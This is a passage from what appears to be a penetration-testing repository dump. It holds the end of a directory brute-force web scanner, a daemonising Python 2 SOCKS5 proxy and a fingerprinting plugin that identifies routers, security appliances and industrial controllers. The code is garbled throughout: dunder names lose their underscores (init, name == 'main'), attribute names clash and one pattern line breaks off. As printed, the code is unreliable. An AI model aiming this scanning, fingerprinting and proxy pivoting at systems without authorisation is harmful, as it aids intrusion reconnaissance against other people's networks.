self.msg_queue.put('trueScan End') 277 | self.STOP_ME = True 278 | 279 | 280 | 281 | def get_argv(alist,astr): 282 | if astr in alist: 283 | try: 284 | return alist[alist.index(astr)+1] 285 | except: 286 | print("%s 参数错误" % astr) 287 | return False 288 | else: 289 | return False 290 | def in_argv(alist,astr): 291 | if astr in alist: 292 | return True 293 | else: 294 | return False 295 | if name == 'main': 296 | s = dirScan() 297 | t = get_argv(sys.argv,'-t') 298 | s.set_thread(50) if not t else s.set_thread(int(t)) 299 | c = get_argv(sys.argv,'-c') 300 | if c: 301 | s.set_status_code([int(i) for i in c.strip().split(',')]) 302 | l = get_argv(sys.argv,'-l') 303 | if l: 304 | s.set_scan_level(int(l)) 305 | urls = [get_argv(sys.argv,'-u')] if in_argv(sys.argv,'-u') else [] 306 | if in_argv(sys.argv,'-U'): 307 | urls = open(get_argv(sys.argv,'-U'),'r').readlines() 308 | e = False if not in_argv(sys.argv,'-e') else get_argv(sys.argv,'-e') 309 | if in_argv(sys.argv,'-fc'):s.set_stop_file() 310 | if in_argv(sys.argv,'-dc'):s.set_stop_url() 311 | if in_argv(sys.argv,'-i'):s.set_not_ignore_case() 312 | if in_argv(sys.argv,'-H'):s.set_request_method("head") 313 | k = get_argv(sys.argv,'-k') 314 | if k: 315 | s.set_re_keyword(k) 316 | if (not in_argv(sys.argv,'-u') and not in_argv(sys.argv,'-U')) or in_argv(sys.argv,'-h'): 317 | print("-t 指定线程") 318 | print("-c 指定返回HTTP状态码(默认200,403,500) -c 200,500") 319 | print("-l 指定扫描深度") 320 | print("-u 指定目标URL") 321 | print("-U 指定目标URL文件,每行一个") 322 | print("-e 指定文件后缀") 323 | print("-fc 关闭文件扫描") 324 | print("-dc 关闭目录扫描") 325 | print("-i 开启大小写敏感") 326 | print("-k 404关键字,支持正则") 327 | print("-H 使用HEAD方式请求，默认为GET") 328 | s.set_stop_me() 329 | else: 330 | try: 331 | s.scan(urls,e) 332 | except KeyboardInterrupt: 333 | s.set_stop_me() 334 | sys.exit(1) 335 | -------------------------------------------------------------------------------- /socks5.py2: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from SocketServer import BaseServer, ThreadingTCPServer, StreamRequestHandler 3 | from socket import socket, AF_INET, SOCK_STREAM 4 | import logging 5 | import signal 6 | import struct 7 | import sys 8 | import thread 9 | import os 10 | import platform 11 | 12 | author = 'Youchao Feng' 13 | support_os = ('Darwin', 'Linux') 14 | current_os = platform.system() 15 | 16 | 17 | def byte_to_int(b): 18 | """ 19 | Convert Unsigned byte to int 20 | :param b: byte value 21 | :return: int value 22 | """ 23 | return b & 0xFF 24 | 25 | 26 | def port_from_byte(b1, b2): 27 | """ 28 | 29 | :param b1: First byte of port 30 | :param b2: Second byte of port 31 | :return: Port in Int 32 | """ 33 | return byte_to_int(b1) << 8 | byte_to_int(b2) 34 | 35 | 36 | def host_from_ip(a, b, c, d): 37 | a = byte_to_int(a) 38 | b = byte_to_int(b) 39 | c = byte_to_int(c) 40 | d = byte_to_int(d) 41 | return "%d.%d.%d.%d" % (a, b, c, d) 42 | 43 | 44 | def get_command_name(value): 45 | """ 46 | Gets command name by value 47 | :param value: value of Command 48 | :return: Command Name 49 | """ 50 | if value == 1: 51 | return 'CONNECT' 52 | elif value == 2: 53 | return 'BIND' 54 | elif value == 3: 55 | return 'UDP_ASSOCIATE' 56 | else: 57 | return None 58 | 59 | 60 | def build_command_response(reply): 61 | start = b'\x05%s\x00\x01\x00\x00\x00\x00\x00\x00' 62 | return start % reply.get_byte_string() 63 | 64 | 65 | def close_session(session): 66 | session.get_client_socket().close() 67 | logging.info("Session[%s] closed" % session.get_id()) 68 | 69 | 70 | def run_daemon_process(stdout='/dev/null', stderr=None, stdin='/dev/null', 71 | pid_file=None, start_msg='started with pid %s'): 72 | """ 73 | This forks the current process into a daemon. 74 | The stdin, stdout, and stderr arguments are file names that 75 | will be opened and be used to replace the standard file descriptors 76 | in sys.stdin, sys.stdout, and sys.stderr. 77 | These arguments are optional and default to /dev/null. 78 | Note that stderr is opened unbuffered, so 79 | if it shares a file with stdout then interleaved output 80 | may not appear in the order that you expect. 81 | """ 82 | # flush io 83 | sys.stdout.flush() 84 | sys.stderr.flush() 85 | # Do first fork. 86 | try: 87 | if os.fork() > 0: 88 | sys.exit(0) # Exit first parent. 89 | except OSError, e: 90 | sys.stderr.write("fork #1 failed: (%d) %s\n" % (e.errno, e.strerror)) 91 | sys.exit(1) 92 | # Decouple from parent environment. 93 | os.chdir("/") 94 | os.umask(0) 95 | os.setsid() 96 | # Do second fork. 97 | try: 98 | if os.fork() > 0: 99 | sys.exit(0) # Exit second parent. 100 | except OSError, e: 101 | sys.stderr.write("fork #2 failed: (%d) %s\n" % (e.errno, e.strerror)) 102 | sys.exit(1) 103 | # Open file descriptors and print start message 104 | if not stderr: 105 | stderr = stdout 106 | si = file(stdin, 'r') 107 | so = file(stdout, 'a+') 108 | se = file(stderr, 'a+', 0) # unbuffered 109 | pid = str(os.getpid()) 110 | sys.stderr.write(start_msg % pid) 111 | sys.stderr.flush() 112 | if pid_file: 113 | file(pid_file, 'w+').write("%s\n" % pid) 114 | # Redirect standard file descriptors. 115 | os.dup2(si.fileno(), sys.stdin.fileno()) 116 | os.dup2(so.fileno(), sys.stdout.fileno()) 117 | os.dup2(se.fileno(), sys.stderr.fileno()) 118 | 119 | 120 | class Session(object): 121 | index = 0 122 | 123 | def init(self, client_socket): 124 | Session.index += 1 125 | self.id = Session.index 126 | self.client_socket = client_socket 127 | self._attr = {} 128 | 129 | def get_id(self): 130 | return self.__id 131 | 132 | def set_attr(self, key, value): 133 | self._attr[key] = value 134 | 135 | def get_client_socket(self): 136 | return self.__client_socket 137 | 138 | 139 | class AddressType(object): 140 | IPV4 = 1 141 | DOMAIN_NAME = 3 142 | IPV6 = 4 143 | 144 | 145 | class SocksCommand(object): 146 | CONNECT = 1 147 | BIND = 2 148 | UDP_ASSOCIATE = 3 149 | 150 | 151 | class SocksMethod(object): 152 | NO_AUTHENTICATION_REQUIRED = 0 153 | GSS_API = 1 154 | USERNAME_PASSWORD = 2 155 | 156 | 157 | class ServerReply(object): 158 | def init(self, value): 159 | self.__value = value 160 | 161 | def get_byte_string(self): 162 | if self.value == 0: 163 | return b'\x00' 164 | elif self.value == 1: 165 | return b'\x01' 166 | elif self.value == 2: 167 | return b'\x02' 168 | elif self.value == 3: 169 | return b'\x03' 170 | elif self.value == 4: 171 | return b'\x04' 172 | elif self.value == 5: 173 | return b'\x05' 174 | elif self.value == 6: 175 | return b'\x06' 176 | elif self.value == 7: 177 | return b'\x07' 178 | elif self.__value == 8: 179 | return b'\x08' 180 | 181 | def get_value(self): 182 | return self.__value 183 | 184 | 185 | class ReplyType(object): 186 | SUCCEEDED = ServerReply(0) 187 | GENERAL_SOCKS_SERVER_FAILURE = ServerReply(1) 188 | CONNECTION_NOT_ALLOWED_BY_RULESET = ServerReply(2) 189 | NETWORK_UNREACHABLE = ServerReply(3) 190 | HOST_UNREACHABLE = ServerReply(4) 191 | CONNECTION_REFUSED = ServerReply(5) 192 | TTL_EXPIRED = ServerReply(6) 193 | COMMAND_NOT_SUPPORTED = ServerReply(7) 194 | ADDRESS_TYPE_NOT_SUPPORTED = ServerReply(8) 195 | 196 | 197 | class SocketPipe(object): 198 | BUFFER_SIZE = 1024 * 1024 199 | 200 | def init(self, socket1, socket2): 201 | self._socket1 = socket1 202 | self._socket2 = socket2 203 | self.running = False 204 | 205 | def transfer(self, socket1, socket2): 206 | while self.__running: 207 | try: 208 | data = socket1.recv(self.BUFFER_SIZE) 209 | if len(data) > 0: 210 | socket2.sendall(data) 211 | else: 212 | break 213 | except IOError: 214 | self.stop() 215 | self.stop() 216 | 217 | def start(self): 218 | self.__running = True 219 | thread.start_new_thread(self.__transfer, (self._socket1, self._socket2)) 220 | thread.start_new_thread(self.__transfer, (self._socket2, self._socket1)) 221 | 222 | def stop(self): 223 | self._socket1.close() 224 | self._socket2.close() 225 | self.__running = False 226 | 227 | def is_running(self): 228 | return self.running 229 | 230 | 231 | class CommandExecutor(object): 232 | def init__(self, remote_server_host, remote_server_port, session): 233 | self.__proxy_socket = socket(AF_INET, SOCK_STREAM) 234 | self.__remote_server_host = remote_server_host 235 | self.__remote_server_port = remote_server_port 236 | self.__client = session.get_client_socket() 237 | self.__session = session 238 | 239 | def do_connect(self): 240 | """ 241 | Do SOCKS CONNECT method 242 | :return: None 243 | """ 244 | result = self.__proxy_socket.connect_ex(self.__get_address()) 245 | if result == 0: 246 | self.__client.send(build_command_response(ReplyType.SUCCEEDED)) 247 | socket_pipe = SocketPipe(self.client, self.proxy_socket) 248 | socket_pipe.start() 249 | while socket_pipe.is_running(): 250 | pass 251 | elif result == 60: 252 | self.__client.send(build_command_response(ReplyType.TTL_EXPIRED)) 253 | elif result == 61: 254 | self.__client.send(build_command_response(ReplyType.NETWORK_UNREACHABLE)) 255 | else: 256 | logging.error('Connection Error:[%s] is unknown' % result) 257 | self.__client.send(build_command_response(ReplyType.NETWORK_UNREACHABLE)) 258 | 259 | def do_bind(self): 260 | pass 261 | 262 | def do_udp_associate(self): 263 | pass 264 | 265 | def __get_address(self): 266 | return self.__remote_server_host, self.__remote_server_port 267 | 268 | 269 | class User(object): 270 | def init(self, username, password): 271 | self.username = username 272 | self.password = password 273 | 274 | def get_username(self): 275 | return self.__username 276 | 277 | def get_password(self): 278 | return self.password 279 | 280 | def repr__(self): 281 | return '' % (self.get_username(), self.password) 282 | 283 | 284 | class UserManager(object): 285 | def init(self): 286 | self.users = {} 287 | 288 | def add_user(self, user): 289 | self.__users[user.get_username()] = user 290 | 291 | def remove_user(self, username): 292 | if username in self.users: 293 | del self.users[username] 294 | 295 | def check(self, username, password): 296 | if username in self.users and self.users[username].get_password() == password: 297 | return True 298 | else: 299 | return False 300 | 301 | def get_user(self, username): 302 | return self.__users[username] 303 | 304 | def get_users(self): 305 | return self.users 306 | 307 | 308 | class Socks5RequestHandler(StreamRequestHandler): 309 | def init__(self, request, client_address, server): 310 | StreamRequestHandler.init(self, request, client_address, server) 311 | 312 | def handle(self): 313 | session = Session(self.connection) 314 | logging.info('Create session[%s] for %s:%d' % ( 315 | 1, self.client_address[0], self.client_address[1])) 316 | print self.server.allowed 317 | if self.server.allowed and self.client_address[0] not in self.server.allowed: 318 | close_session(session) 319 | return 320 | client = self.connection 321 | client.recv(1) 322 | method_num, = struct.unpack('b', client.recv(1)) 323 | methods = struct.unpack('b' * method_num, client.recv(method_num)) 324 | auth = self.server.is_auth() 325 | if methods.contains(SocksMethod.NO_AUTHENTICATION_REQUIRED) and not auth: 326 | client.send(b"\x05\x00") 327 | elif methods.contains(SocksMethod.USERNAME_PASSWORD) and auth: 328 | client.send(b"\x05\x02") 329 | if not self.__do_username_password_auth(): 330 | logging.info('Session[%d] authentication failed' % session.get_id()) 331 | close_session(session) 332 | return 333 | else: 334 | client.send(b"\x05\xFF") 335 | return 336 | version, command, reserved, address_type = struct.unpack('b' * 4, client.recv(4)) 337 | host = None 338 | port = None 339 | if address_type == AddressType.IPV4: 340 | ip_a, ip_b, ip_c, ip_d, p1, p2 = struct.unpack('b' * 6, client.recv(6)) 341 | host = host_from_ip(ip_a, ip_b, ip_c, ip_d) 342 | port = port_from_byte(p1, p2) 343 | elif address_type == AddressType.DOMAIN_NAME: 344 | host_length, = struct.unpack('b', client.recv(1)) 345 | host = client.recv(host_length) 346 | p1, p2 = struct.unpack('b' * 2, client.recv(2)) 347 | port = port_from_byte(p1, p2) 348 | else: # address type not support 349 | client.send(build_command_response(ReplyType.ADDRESS_TYPE_NOT_SUPPORTED)) 350 | 351 | command_executor = CommandExecutor(host, port, session) 352 | if command == SocksCommand.CONNECT: 353 | logging.info("Session[%s] Request connect %s:%d" % (session.get_id(), host, port)) 354 | command_executor.do_connect() 355 | close_session(session) 356 | 357 | def __do_username_password_auth(self): 358 | client = self.connection 359 | client.recv(1) 360 | length = byte_to_int(struct.unpack('b', client.recv(1))[0]) 361 | username = client.recv(length) 362 | length = byte_to_int(struct.unpack('b', client.recv(1))[0]) 363 | password = client.recv(length) 364 | user_manager = self.server.get_user_manager() 365 | if user_manager.check(username, password): 366 | client.send(b"\x01\x00") 367 | return True 368 | else: 369 | client.send(b"\x01\x01") 370 | return False 371 | 372 | 373 | class Socks5Server(ThreadingTCPServer): 374 | """ 375 | SOCKS5 proxy server 376 | """ 377 | 378 | def init(self, port, auth=False, user_manager=UserManager(), allowed=None): 379 | ThreadingTCPServer.init(self, ('', port), Socks5RequestHandler) 380 | self.port = port 381 | self.users = {} 382 | self.auth = auth 383 | self.user_manager = user_manager 384 | self.__sessions = {} 385 | self.allowed = allowed 386 | 387 | def serve_forever(self, poll_interval=0.5): 388 | logging.info("Create SOCKS5 server at port %d" % self.__port) 389 | ThreadingTCPServer.serve_forever(self, poll_interval) 390 | 391 | def finish_request(self, request, client_address): 392 | BaseServer.finish_request(self, request, client_address) 393 | 394 | def is_auth(self): 395 | return self.__auth 396 | 397 | def set_auth(self, auth): 398 | self.__auth = auth 399 | 400 | def get_all_managed_session(self): 401 | return self.__sessions 402 | 403 | def get_bind_port(self): 404 | return self.__port 405 | 406 | def get_user_manager(self): 407 | return self.__user_manager 408 | 409 | def set_user_manager(self, user_manager): 410 | self.__user_manager = user_manager 411 | 412 | 413 | def show_help(): 414 | print 'Usage: start|stop|restart|status [options]' 415 | print 'Options:' 416 | print ' --port= Sets server port, default 1080' 417 | print ' --log=true|false Logging on, default true' 418 | print ' --allowed=IP set allowed IP list' 419 | print ' --auth: Use username/password authentication' 420 | print ' Example:' 421 | print ' Create user \"admin\" with password \"1234\":' 422 | print ' --auth=admin:1234 ' 423 | print ' Create tow users:' 424 | print ' --auth=admin:1234,root:1234' 425 | print ' -h Show Help' 426 | 427 | 428 | def check_os_support(): 429 | if not support_os.contains(current_os): 430 | print 'Not support in %s' % current_os 431 | sys.exit() 432 | 433 | 434 | def stop(pid_file): 435 | check_os_support() 436 | print 'Stopping server...', 437 | try: 438 | f = open(pid_file, 'r') 439 | pid = int(f.readline()) 440 | os.kill(pid, signal.SIGTERM) 441 | os.remove(pid_file) 442 | print " [OK]" 443 | except IOError: 444 | print "pysocks is not running" 445 | except OSError: 446 | print "pysocks is not running" 447 | 448 | 449 | def status(pid_file): 450 | check_os_support() 451 | try: 452 | f = open(pid_file, 'r') 453 | pid = int(f.readline()) 454 | print 'pysocks(pid %d) is running...' % pid 455 | except IOError: 456 | print "pysocks is stopped" 457 | 458 | 459 | def main(): 460 | port = 8088 461 | enable_log = True 462 | log_file = 'socks.log' 463 | auth = False 464 | user_home = os.path.expanduser('~') 465 | pid_file = user_home + '/.pysocks.pid' 466 | user_manager = UserManager() 467 | allowed_ips = None 468 | 469 | if sys.argv.len() < 2: 470 | show_help() 471 | sys.exit() 472 | 473 | command = sys.argv[1] 474 | if command == 'start': 475 | pass 476 | elif command == 'stop': 477 | stop(pid_file) 478 | sys.exit() 479 | elif command == 'restart': 480 | stop(pid_file) 481 | elif command == 'status': 482 | status(pid_file) 483 | sys.exit() 484 | else: 485 | show_help() 486 | sys.exit() 487 | 488 | for arg in sys.argv[2:]: 489 | if arg.startswith('--port='): 490 | try: 491 | port = int(arg.split('=')[1]) 492 | except ValueError: 493 | print '--port= should be a number' 494 | sys.exit() 495 | elif arg.startswith('--auth'): 496 | auth = True 497 | users = arg.split('=')[1] 498 | for user in users.split(','): 499 | user_pwd = user.split(':') 500 | user_manager.add_user(User(user_pwd[0], user_pwd[1])) 501 | elif arg == '-h': 502 | show_help() 503 | sys.exit() 504 | elif arg.startswith('--log='): 505 | value = arg.split('=')[1] 506 | if value == 'true': 507 | enable_log = True 508 | elif value == 'false': 509 | enable_log = False 510 | else: 511 | print '--log= should be true or false' 512 | sys.exit() 513 | elif arg.startswith('--allowed='): 514 | value = arg.split('=')[1] 515 | allowed_ips = value.split(',') 516 | else: 517 | print 'Unknown argument:%s' % arg 518 | sys.exit() 519 | if enable_log: 520 | logging.basicConfig(level=logging.INFO, 521 | format='%(asctime)s %(levelname)s - %(message)s', 522 | filename=log_file, 523 | filemode='a') 524 | console = logging.StreamHandler(sys.stdout) 525 | console.setLevel(logging.INFO) 526 | formatter = logging.Formatter('%(asctime)s %(levelname)-5s %(lineno)-3d - %(message)s') 527 | console.setFormatter(formatter) 528 | logging.getLogger().addHandler(console) 529 | 530 | Socks5Server.allow_reuse_address = True 531 | socks5_server = Socks5Server(port, auth, user_manager, allowed=allowed_ips) 532 | try: 533 | if support_os.contains(current_os): 534 | run_daemon_process(pid_file=pid_file, start_msg='Start SOCKS5 server at pid %s\n') 535 | socks5_server.serve_forever() 536 | except KeyboardInterrupt: 537 | socks5_server.server_close() 538 | socks5_server.shutdown() 539 | logging.info("SOCKS5 server shutdown") 540 | 541 | 542 | if name == 'main': 543 | main() 544 | -------------------------------------------------------------------------------- /cms.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This file is part of WhatWeb and may be subject to 3 | # redistribution and commercial restrictions. Please see the WhatWeb 4 | # web site for more information on licensing and terms of use. 5 | # https://morningstarsecurity.com/research/whatweb 6 | ## 7 | Plugin.define do 8 | name "CMS" 9 | authors [ 10 | "Andrew Horton", 11 | # v0.2 # removed :probability. 12 | "Brendan Coles ", # v0.3 # 2011-02-21 # Added OS detection. 13 | # Brendan Coles , # v0.4 # 2011-04-08 # Updated OS detection. 14 | ] 15 | version "0.4" 16 | description "HTTP server header string. This plugin also attempts to identify the operating system from the server header." 17 | 18 | # Passive # 19 | passive do 20 | m=[] 21 | m << { :name=>"Dell-Printer", :string=>"Dell-Printer"} if @title=~/Dell Laser Printer/ 22 | #m << { :name=>"HP-OfficeJet-Printer", :string=>"HP-OfficeJet-Printer"} if @title=~/HP Officejet/ || @body=~/align="center/>HP Officejet/ 23 | m << { :name=>"Biscom-Delivery-Server", :string=>"Biscom-Delivery-Server"} if @body=~/\/bds\/stylesheets\/fds\.css/ || @body=~/\/bds\/includes\/fdsJavascript\.do/ 24 | m << { :name=>"DD-WRT", :string=>"DD-WRT"} if @body=~/style\/pwc\/ddwrt\.css/ 25 | m << { :name=>"ewebeditor", :string=>"ewebeditor"} if @body=~/\/ewebeditor\.htm?/ 26 | m << { :name=>"fckeditor", :string=>"fckeditor"} if @body=~/new FCKeditor/ 27 | m << { :name=>"xheditor", :string=>"xheditor"} if @body=~/xheditor_lang\/zh-cn\.js/||@body=~/class="xheditor/||@body=~/\.xheditor\(/ 28 | m << { :name=>"百为路由", :string=>"百为路由"} if @body=~/提交验证的id必须是ctl_submit/ 29 | m << { :name=>"锐捷NBR路由器", :string=>"锐捷NBR路由器"} if @body=~/free_nbr_login_form\.png/ 30 | m << { :name=>"mikrotik", :string=>"mikrotik"} if @title=~/RouterOS/ && @body=~/mikrotik/ 31 | m << { :name=>"ThinkSNS", :string=>"ThinkSNS"} if @body=~/\/addons\/theme\// && @body=~/全局变量/ 32 | m << { :name=>"h3c路由器", :string=>"h3c路由器"} if @title=~/Web user login/ && @body=~/nLanguageSupported/ 33 | m << { :name=>"jcg无线路由器", :string=>"jcg无线路由器"} if @title=~/Wireless Router/ && @body=~/:\/\/www\.jcgcn\.com/ 34 | m << { :name=>"D-Link_VoIP_Wireless_Router", :string=>"D-Link_VoIP_Wireless_Router"} if @title=~/D-Link VoIP Wireless Router/ 35 | m << { :name=>"arrisi_Touchstone", :string=>"arrisi_Touchstone"} if @title=~/Touchstone Status/ || @body=~/passWithWarnings/ 36 | m << { :name=>"ZyXEL", :string=>"ZyXEL"} if @body=~/Forms\/rpAuth_1/ 37 | m << { :name=>"Ruckus", :string=>"Ruckus"} if @body=~/mon\. Tell me your username/ || @title=~/Ruckus Wireless Admin/ 38 | m << { :name=>"Motorola_SBG900", :string=>"Motorola_SBG900"} if @title=~/Motorola SBG900/ 39 | m << { :name=>"Wimax_CPE", :string=>"Wimax_CPE"} if @title=~/Wimax CPE Configuration/ 40 | m << { :name=>"Cisco_Cable_Modem", :string=>"Cisco_Cable_Modem"} if @title=~/Cisco Cable Modem/ 41 | m << { :name=>"Scientific-Atlanta_Cable_Modem", :string=>"Scientific-Atlanta_Cable_Modem"} if @title=~/Scientific-Atlanta Cable Modem/ 42 | m << { :name=>"rap", :string=>"rap"} if @body=~/\/jscripts\/rap_util\.js/ 43 | m << { :name=>"ZTE_MiFi_UNE", :string=>"ZTE_MiFi_UNE"} if @title=~/MiFi UNE 4G LTE/ 44 | m << { :name=>"ZTE_ZSRV2_Router", :string=>"ZTE_ZSRV2_Router"} if @title=~/ZSRV2路由器Web管理系统/ && @body=~/ZTE Corporation\. All Rights Reserved\./ 45 | #m << { :name=>"百为智能流控路由器", :string=>"百为智能流控路由器"} if @title=~/BYTEVALUE 智能流控路由器/ && @body=~// 46 | #m << { :name=>"乐视路由器", :string=>"乐视路由器"} if @title=~/乐视路由器/ && @body=~/
"Verizon_Wireless_Router"} if @title=~/Wireless Broadband Router Management Console/ && @body=~ /verizon_logo_blk\.gif/ 48 | m << { :name=>"Nexus_NX_router", :string=>"Nexus_NX_router"} if @body=~/http:\/\/nexuswifi\.com\// && @title=~/Nexus NX/ 49 | m << { :name=>"Verizon_Router", :string=>"Verizon_Router"} if @title=~/Verizon Router/ 50 | m << { :name=>"小米路由器", :string=>"小米路由器"} if @title=~/小米路由器/ 51 | m << { :name=>"QNO_Router", :string=>"QNO_Router"} if @body=~/\/QNOVirtual_Keyboard\.js/ && @body=~/\/images\/login_img01_03\.gif/ 52 | m << { :name=>"爱快流控路由", :string=>"爱快流控路由"} if @title=~/爱快/ && @body=~/\/resources\/images\/land_prompt_ico01\.gif/ 53 | m << { :name=>"Django", :string=>"Django"} if @body=~/__admin_media_prefix__/ || @body=~/csrfmiddlewaretoken/ 54 | m << { :name=>"axis2-web", :string=>"axis2-web"} if @body=~/axis2-web\/css\/axis-style\.css/ 55 | m << { :name=>"Apache-Wicket", :string=>"Apache-Wicket"} if @body=~/xmlns:wicket/ || @body=~/\/org\.apache\.wicket\./ 56 | m << { :name=>"BEA-WebLogic-Server", :string=>"BEA-WebLogic-Server"} if @body=~/
BEA WebLogic Server/ || @body=~/WebLogic/ 57 | m << { :name=>"EDK", :string=>"EDK"} if @body=~// 58 | m << { :name=>"eDirectory", :string=>"eDirectory"} if @body=~/target="_blank">eDirectory&trade/ || @body=~/Powered by "Esvon-Classifieds"} if @body=~/Powered by Esvon/ 60 | m << { :name=>"Fluid-Dynamics-Search-Engine", :string=>"Fluid-Dynamics-Search-Engine"} if @body=~/content="fluid dynamics/ 61 | m << { :name=>"mongodb", :string=>"mongodb"} if @body=~/Replica set status<\/a><\/p>/ 62 | m << { :name=>"MVB2000", :string=>"MVB2000"} if @title=~/MVB2000/ || @body=~/The Magic Voice Box/ 63 | m << { :name=>"GPSweb", :string=>"GPSweb"} if @title=~/GPSweb/ 64 | m << { :name=>"phpinfo", :string=>"phpinfo"} if @title=~/phpinfo/ && @body=~/Virtual Directory Support / 65 | m << { :name=>"lemis管理系统", :string=>"lemis管理系统"} if @body=~/lemis\.WEB_APP_NAME/ 66 | m << { :name=>"FreeboxOS", :string=>"FreeboxOS"} if @title=~/Freebox OS/ || @body=~/logo_freeboxos/ 67 | m << { :name=>"Wimax_CPE", :string=>"Wimax_CPE"} if @title=~/Wimax CPE Configuration/ 68 | m << { :name=>"Scientific-Atlanta_Cable_Modem", :string=>"Scientific-Atlanta_Cable_Modem"} if @title=~/Scientific-Atlanta Cable Modem/ 69 | m << { :name=>"rap", :string=>"rap"} if @body=~/\/jscripts\/rap_util\.js/ 70 | m << { :name=>"ZTE_MiFi_UNE", :string=>"ZTE_MiFi_UNE"} if @title=~/MiFi UNE 4G LTE/ 71 | m << { :name=>"用友商战实践平台", :string=>"用友商战实践平台"} if @body=~/Login_Main_BG/ && @body=~/Login_Owner/ 72 | m << { :name=>"moosefs", :string=>"moosefs"} if @body=~/mfs\.cgi/ || @body=~/under-goal files/ 73 | m << { :name=>"蓝盾BDWebGuard", :string=>"蓝盾BDWebGuard"} if @body=~/BACKGROUND: url\(images\/loginbg\.jpg\) #e5f1fc/ 74 | m << { :name=>"护卫神网站安全系统", :string=>"护卫神网站安全系统"} if @title=~/护卫神\.网站安全系统/ 75 | m << { :name=>"phpDocumentor", :string=>"phpDocumentor"} if @body=~/Generated by phpDocumentor/ 76 | m << { :name=>"Adobe_ CQ5", :string=>"Adobe_ CQ5"} if @body=~/_jcr_content/ 77 | #m << { :name=>"Adobe_GoLive", :string=>"Adobe_GoLive"} if @body=~/generator/ content="Adobe GoLive/ 78 | #m << { :name=>"Adobe_RoboHelp", :string=>"Adobe_RoboHelp"} if @body=~/generator/ content="Adobe RoboHelp/ 79 | m << { :name=>"Amaya", :string=>"Amaya"} if @body=~/generator" content="Amaya/ 80 | m << { :name=>"OpenMas", :string=>"OpenMas"} if @title=~/OpenMas/ || @body=~/loginHead">"recaptcha"} if @body=~/recaptcha_ajax\.js/ 82 | m << { :name=>"TerraMaster", :string=>"TerraMaster"} if @title=~/TerraMaster/ && @body=~/\/js\/common\.js/ 83 | m << { :name=>"创星伟业校园网群", :string=>"创星伟业校园网群"} if @body=~/javascripts\/float\.js/ && @body=~/vcxvcxv/ 84 | m << { :name=>"正方教务管理系统", :string=>"正方教务管理系统"} if @body=~/style\/base\/jw\.css/ 85 | m << { :name=>"UFIDA_NC", :string=>"UFIDA_NC"} if (@body=~/UFIDA/ && @body=~/logo\/images\//) || @body=~/logo\/images\/ufida_nc\.png/ 86 | m << { :name=>"北创图书检索系统", :string=>"北创图书检索系统"} if @body=~/opac_two/ 87 | m << { :name=>"北京清科锐华CEMIS", :string=>"北京清科锐华CEMIS"} if @body=~/\/theme\/2009\/image/ && @body=~/login\.asp/ 88 | m << { :name=>"RG-PowerCache内容加速系统", :string=>"RG-PowerCache内容加速系统"} if @title=~/RG-PowerCache/ 89 | m << { :name=>"sugon_gridview", :string=>"sugon_gridview"} if @body=~/\/common\/resources\/images\/common\/app\/gridview\.ico/ 90 | m << { :name=>"SLTM32_Configuration", :string=>"SLTM32_Configuration"} if @title=~/SLTM32 Web Configuration Pages / 91 | m << { :name=>"SHOUTcast", :string=>"SHOUTcast"} if @title=~/SHOUTcast Administrator/ 92 | m << { :name=>"milu_seotool", :string=>"milu_seotool"} if @body=~/plugin\.php?id=milu_seotool/ 93 | m << { :name=>"CISCO_EPC3925", :string=>"CISCO_EPC3925"} if @body=~/Docsis_system/ && @body=~/EPC3925/ 94 | m << { :name=>"HP_iLO(HP_Integrated_Lights-Out)", :string=>"HP_iLO(HP_Integrated_Lights-Out)"} if @body=~/js\/iLO\.js/ 95 | m << { :name=>"Siemens_SIMATIC", :string=>"Siemens_SIMATIC"} if @body=~/\/S7Web\.css/ 96 | m << { :name=>"Schneider_Quantum_140NOE77101", :string=>"Schneider_Quantum_140NOE77101"} if @body=~/indexLanguage/ && @body=~/html\/config\.js/ 97 | m << { :name=>"lynxspring_JENEsys", :string=>"lynxspring_JENEsys"} if @body=~/LX JENEsys/ 98 | m << { :name=>"Sophos_Web_Appliance", :string=>"Sophos_Web_Appliance"} if @title=~/Sophos Web Appliance/ 99 | m << { :name=>"Comcast_Business", :string=>"Comcast_Business"} if @body=~/cmn\/css\/common-min\.css/ 100 | m << { :name=>"Locus_SolarNOC", :string=>"Locus_SolarNOC"} if @title=~/SolarNOC - Login/ 101 | m << { :name=>"Everything", :string=>"Everything"} if (@body=~/Everything\.gif/||@body=~/everything\.png/) && @title=~/Everything/ 102 | m << { :name=>"honeywell NetAXS", :string=>"honeywell NetAXS"} if @title=~/Honeywell NetAXS/ 103 | m << { :name=>"Symantec Messaging Gateway", :string=>"Symantec Messaging Gateway"} if @title=~/Messaging Gateway/ 104 | m << { :name=>"xfinity", :string=>"xfinity"} if @title=~/Xfinity/ || @body=~/\/reset-meyer-1\.0\.min\.css/ 105 | m << { :name=>"网动云视讯平台", :string=>"网动云视讯平台"} if @title=~/Acenter/ || @body=~/\/js\/roomHeight\.js/ || @body=~/meetingShow!show\.action/ 106 | m << { :name=>"蓝凌EIS智慧协同平台", :string=>"蓝凌EIS智慧协同平台"} if @body=~/\/scripts\/jquery\.landray\.common\.js/ || @body=~/v11_QRcodeBar clr/ 107 | m << { :name=>"金山KingGate", :string=>"金山KingGate"} if @body=~/\/src\/system\/login\.php/ 108 | m << { :name=>"天融信入侵检测系统TopSentry", :string=>"天融信入侵检测系统TopSentry"} if @title=~/天融信入侵检测系统TopSentry/ 109 | m << { :name=>"天融信日志收集与分析系统", :string=>"天融信日志收集与分析系统"} if @title=~/天融信日志收集与分析系统/ 110 | m << { :name=>"天融信WEB应用防火墙", :string=>"天融信WEB应用防火墙"} if @title=~/天融信WEB应用防火墙/ 111 | m << { :name=>"天融信入侵防御系统TopIDP", :string=>"天融信入侵防御系统TopIDP"} if @body=~/天融信入侵防御系统TopIDP/ 112 | m << { :name=>"天融信Web应用安全防护系统", :string=>"天融信Web应用安全防护系统"} if @title=~/天融信Web应用安全防护系统/ 113 | m << { :name=>"天融信TopFlow", :string=>"天融信TopFlow"} if @body=~/天融信TopFlow/ 114 | m << { :name=>"汉码软件", :string=>"汉码软件"} if @title=~/汉码软件/ || @body=~/alt="汉码软件LOGO/ || @body=~/content="汉码软件/ 115 | m << { :name=>"凡科", :string=>"凡科"} if @body=~/凡科互联网科技股份有限公司/ || @body=~/content="凡科/ 116 | m << { :name=>"易分析", :string=>"易分析"} if @title=~/易分析 PHPStat Analytics/ || @body=~/PHPStat Analytics 网站数据分析系统/ 117 | m << { :name=>"phpems考试系统", :string=>"phpems考试系统"} if @title=~/phpems/ || @body=~/content="PHPEMS/ 118 | m << { :name=>"智睿软件", 